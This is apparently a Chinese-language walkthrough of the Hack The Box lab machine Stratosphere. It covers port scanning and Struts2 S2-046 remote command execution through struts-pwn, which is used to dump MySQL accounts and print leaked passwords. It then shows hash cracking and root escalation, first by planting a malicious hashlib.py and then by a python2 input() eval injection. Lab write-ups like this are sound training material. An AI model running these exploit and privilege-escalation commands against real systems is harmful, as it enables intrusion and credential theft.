端口扫描

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:42 CST
Nmap scan report for 10.10.10.64
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap -sT -sC -sV -O -p22,80,8080 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:46 CST
Nmap scan report for 10.10.10.64
Host is up (0.068s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
|   256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_  256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp   open  http
|_http-title: Stratosphere
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Accept-Ranges: bytes
<SNIP>
8080/tcp open  http-proxy
|_http-title: Stratosphere
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
<SNIP>
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (97%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ sudo nmap --script=vuln -p22,80,8080 10.10.10.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 23:50 CST
Nmap scan report for 10.10.10.64
Host is up (0.067s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /manager/html/upload: Apache Tomcat (401 )
|_  /manager/html: Apache Tomcat (401 )
8080/tcp open  http-proxy
| http-enum: 
|   /manager/html/upload: Apache Tomcat (401 )
|_  /manager/html: Apache Tomcat (401 )

Nmap done: 1 IP address (1 host up) scanned in 247.21 seconds

tomcat?不过/manager确实是tomcat的目录

Stucts2

80和8080端口事一样的，有一个/manager，但是需要凭证，这个门户网站可以说是毫无漏洞了,扫一下目录

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ gobuster dir -u http://10.10.10.64 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.64
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manager              (Status: 302) [Size: 0] [--> /manager/]
/Monitoring           (Status: 302) [Size: 0] [--> /Monitoring/]
/http%3A%2F%2Fwww     (Status: 400) [Size: 813]

除了manager还有一个/Monitoring,访问之后被重定向到了/Monitoring/example/Welcome.action,登陆界面也是，很明显是structs2框架

记得在vulhub中有打过，直接掏出综合利用工具

┌──(mikannse㉿kali)-[~/tools/web/java/Struts2-Scan]
└─$ python Struts2Scan.py -u http://10.10.10.64/Monitoring/example/Welcome.action

 ____  _              _       ____    ____                  
/ ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __                                           
\___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \                                          
 ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |                                         
|____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|                                         
                                                                                                     
                                      Author By HatBoy                                               
                                                                                                     
[+] 正在扫描URL:http://10.10.10.64/Monitoring/example/Welcome.action
[*] ----------------results------------------
[*] http://10.10.10.64/Monitoring/example/Welcome.action 存在漏洞: S2-046

是能够直接RCE的: https://github.com/mazen160/struts-pwn

┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c id    

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: id
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

[%] Done.

做一个反弹shell，

数据库文件

[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

tomcat的user.xml

<user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui"

然而做不了反弹shell也上不了manager,还有一个开在本机的mysql,用得到的凭证看一下数据

┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "show databases;"'   

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "show databases;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

Database
information_schema
users

[%] Done.

┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "use users;show tables;"'         

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "use users;show tables;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

Tables_in_users
accounts

[%] Done.

┌──(mikannse㉿kali)-[~/tools/web/java/struts-pwn]
└─$ python struts-pwn.py -u http://10.10.10.64:8080/Monitoring/example/Welcome.action -c 'mysql -uadmin -padmin -e "use users;select * from accounts;"'  

[*] URL: http://10.10.10.64:8080/Monitoring/example/Welcome.action
[*] CMD: mysql -uadmin -padmin -e "use users;select * from accounts;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ("Connection broken: InvalidChunkLength(got length b'', 0 bytes read)", InvalidChunkLength(got length b'', 0 bytes read))
Note: Server Connection Closed Prematurely

fullName        password        username
Richard F. Smith        9tc*rhKuG5TyXvUJOrE^5CK7k       richard

提权

得到账密能够ssh,能够sudo执行一个python脚本

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
    (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py

richard@stratosphere:~$ cat test.py 
#!/usr/bin/python3
import hashlib


def question():
    q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
    md5 = hashlib.md5()
    md5.update(q1.encode())
    if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
        print("Sorry, that's not right")
        return
    print("You got it!")
    q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
    sha1 = hashlib.sha1()
    sha1.update(q2.encode())
    if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
        print("Nope, that one didn't work...")
        return
    print("WOW, you're really good at this!")
    q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
    md4 = hashlib.new('md4')
    md4.update(q3.encode())
    if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
        print("Yeah, I don't think that's right.")
        return
    print("OK, OK! I get it. You know how to crack hashes...")
    q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
    blake = hashlib.new('BLAKE2b512')
    blake.update(q4.encode())
    if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
        print("You were so close! urg... sorry rules are rules.")
        return

    import os
    os.system('/root/success.py')
    return

question()

解密哈希的小游戏，前面几个跑在线网站都能出，最后一个需要指定一下哈希类型自己离线破解一下

┌──(mikannse㉿kali)-[~/HTB/Stratosphere]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-Blake2 hash 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-Blake2 [BLAKE2b 512 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fhero6610        (?)     
1g 0:00:00:01 DONE (2024-09-10 12:55) 0.9433g/s 10634Kp/s 10634Kc/s 10634KC/s Ganama25..DAKOTA31
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

然而被骗了,根本没有/root/success.py这个文件,改用在这个目录创建一个hashlib.py,因为python会查找这个脚本最近的库文件

richard@stratosphere:~$ echo "import os;os.system('/bin/bash')" >hashlib.py
richard@stratosphere:~$ sudo /usr/bin/python3.7 /home/richard/test.py
root@stratosphere:/home/richard# whoami
root

或者可以利用python2的input()函数漏洞python2中的input()等同于eval(raw_input()),所以也可以:

richard@stratosphere:~$ sudo /usr/bin/python2.7 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
__import__('os').system('/bin/bash')
root@stratosphere:/home/richard# whoami
root

碎碎念

算是第一次打struts2，后面部分还是比较简单的，java的洞还是得多打